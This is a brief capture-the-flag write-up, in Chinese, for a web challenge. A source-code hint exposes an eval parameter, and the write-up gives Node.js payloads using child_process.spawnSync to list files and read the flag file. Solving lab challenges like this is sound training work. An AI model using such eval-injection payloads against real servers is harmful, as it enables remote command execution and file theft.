f12 源码提示 <!-- /?eval= --> 即简单命令执行 /?eval=require('child_process').spawnSync('ls',['.']).stdout.toString() 获取 flag /?eval=require(%27child_process%27).spawnSync(%27cat%27,[%27fl00g.txt%27]).stdout.toString()
